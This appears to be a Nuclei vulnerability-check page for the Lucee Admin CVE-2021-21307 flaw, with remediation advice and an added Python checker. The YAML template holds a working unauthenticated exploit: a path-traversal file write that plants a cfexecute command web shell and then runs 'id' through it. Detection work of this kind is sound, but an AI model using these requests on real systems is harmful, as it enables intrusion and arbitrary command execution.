Lucee Admin - Remote Code Execution
ID: CVE-2021-21307
Severity: critical
Author: dhiyaneshDk
Tags: cve2021,cve,rce,lucee,adobe
Description
Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. The administrator page /lucee/admin/imgProcess.cfm is reachable without authentication and does not sanitize its file query parameter, so a path-traversal value such as file=/../../../context/<name>.cfm causes the contents of the imgSrc form field to be written as a .cfm file inside the web context; a subsequent request to /lucee/<name>.cfm executes that CFML with the privileges of the Lucee process. The issue is fixed in 5.3.7.47, 5.3.6.68 and 5.3.5.96. Until the upgrade is applied, block access to the Lucee Administrator, for example by denying the /lucee/admin/ path at the web server or reverse proxy in front of Lucee.
YAML Source
id: CVE-2021-21307

info:
  name: Lucee Admin - Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
  reference:
    - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
    - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
    - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response
    - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-21307
    cwe-id: CWE-862
    epss-score: 0.97313
    epss-percentile: 0.99874
    cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: lucee
    product: lucee_server
  tags: cve2021,cve,rce,lucee,adobe

http:
  - raw:
      - |
        POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        imgSrc=a
      - |
        POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        imgSrc= <cfoutput>
        <table>
        <form method="POST" action="">
        <tr><td>Command:</td><td><input type=test name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
        <tr><td>Options:</td><td> <input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
        <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#" <cfelse> value="5"</cfif>></td></tr>
        </table>
        <input type=submit value="Exec" >
        </form>
        <cfif isdefined("form.cmd")>
        <cfsavecontent variable="myVar">
        <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
        </cfexecute>
        </cfsavecontent>
        <pre>
        #HTMLCodeFormat(myVar)#
        </pre>
        </cfif>
        </cfoutput>
      - |
        POST /lucee/{{randstr}}.cfm HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded

        cmd=id&opts=&timeout=5

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
          - "groups="
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "(u|g)id=.*"
# digest: 490a00463044022014a214ab29d500e2c06c3fc5f1c4a043a0fa6463b16a7e2b472718050a7fb927022045402d53673b394b566bd9bf0a73db9313c4cfa5b60a45dffa958b2b124c3ed9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
Run the template against a single target with Nuclei:

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21307.yaml"

The template sends three requests: an initial POST to /lucee/admin/imgProcess.cfm with a dummy file parameter and imgSrc=a, a second POST whose file parameter traverses into the web context so that the cfexecute-based command form in imgSrc is written as {{randstr}}.cfm, and a final POST to /lucee/{{randstr}}.cfm with cmd=id. The target is reported vulnerable only when that last response is HTTP 200 and its body contains uid=, gid= and groups=; the regex extractor captures the matching id output line, so the account Lucee runs as is visible in the scan result. A positive match therefore means a command-execution page now exists in the target's web root under /lucee/. The template does not remove it, so delete the file after the scan.
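The following Python script is an added example, not part of the nuclei template or of Lucee. It replays the same three-request sequence against an assumed target (BASE_URL, the generated file name and the marker string are all assumptions made here), but instead of the template's cfexecute form it writes a random marker string as the .cfm file, so a positive result still proves the unauthenticated arbitrary file write through imgProcess.cfm without leaving a command shell behind. The template's word matcher and regex extractor are reproduced as functions so a response body captured from a real scan can also be evaluated offline.

```python
"""Standalone reproduction of the check the CVE-2021-21307 template performs.

Added example, not part of the nuclei template or of Lucee. BASE_URL is an
assumed target; the file name and marker are generated here. The payload
written through the traversal is a static marker rather than a cfexecute
form, so the check proves the unauthenticated .cfm write without leaving a
command shell on the server.
"""
import re
import secrets
import urllib.error
import urllib.parse
import urllib.request

BASE_URL = "http://lucee.example.internal:8888"   # assumption: host under test
ADMIN_ENDPOINT = "/lucee/admin/imgProcess.cfm"
# Same traversal the template uses: up out of the admin thumbnail directory
# into the web context, so the file becomes reachable as /lucee/<name>.cfm.
TRAVERSAL = "/../../../context/{name}.cfm"
ID_LINE_RE = re.compile(r"(u|g)id=.*")           # the template's extractor regex
REQUIRED_WORDS = ("uid=", "gid=", "groups=")     # the template's word matcher


def build_requests(name, payload, trigger_body=None):
    """Return (method, path, body) triples in the order the template sends them.

    The third request is a plain GET when no trigger body is given (marker
    payload); the template itself POSTs cmd=id&opts=&timeout=5 to its shell.
    """
    encoded = urllib.parse.quote(payload, safe="")
    return [
        ("POST", f"{ADMIN_ENDPOINT}?file=/whatever", "imgSrc=a"),
        ("POST", f"{ADMIN_ENDPOINT}?file={TRAVERSAL.format(name=name)}",
         f"imgSrc={encoded}"),
        ("POST" if trigger_body is not None else "GET",
         f"/lucee/{name}.cfm", trigger_body),
    ]


def template_matches(status, body):
    """Apply the template's matchers (AND): HTTP 200 and all three id words present."""
    return status == 200 and all(word in body for word in REQUIRED_WORDS)


def extract_ids(body):
    """Apply the template's extractor: each match runs from uid=/gid= to end of line."""
    return [m.group(0) for m in ID_LINE_RE.finditer(body)]


def marker_found(status, body, marker):
    """Matcher for the benign variant: the written file is served back verbatim."""
    return status == 200 and marker in body


def send(method, path, body):
    """Issue one request and return (status, body); HTTP errors are returned, not raised."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(BASE_URL + path, data=data, method=method)
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def run_check():
    """Write a marker .cfm through the traversal, fetch it back, report the result."""
    name = "chk" + secrets.token_hex(6)
    marker = secrets.token_hex(16)
    status = body = None
    for method, path, data in build_requests(name, marker):
        status, body = send(method, path, data)
    vulnerable = marker_found(status, body, marker)
    print(f"{BASE_URL}: {'VULNERABLE' if vulnerable else 'not vulnerable'}"
          f" (last status {status}); file written: /lucee/{name}.cfm")
    return vulnerable


if __name__ == "__main__":
    run_check()
```

A confirmed marker write is equivalent to code execution, since Lucee compiles and runs whatever lands in that .cfm, so there is no need to drop the command form to prove the point. The marker file still sits in the web context after the check; remove /lucee/<name>.cfm on the target once the result is recorded.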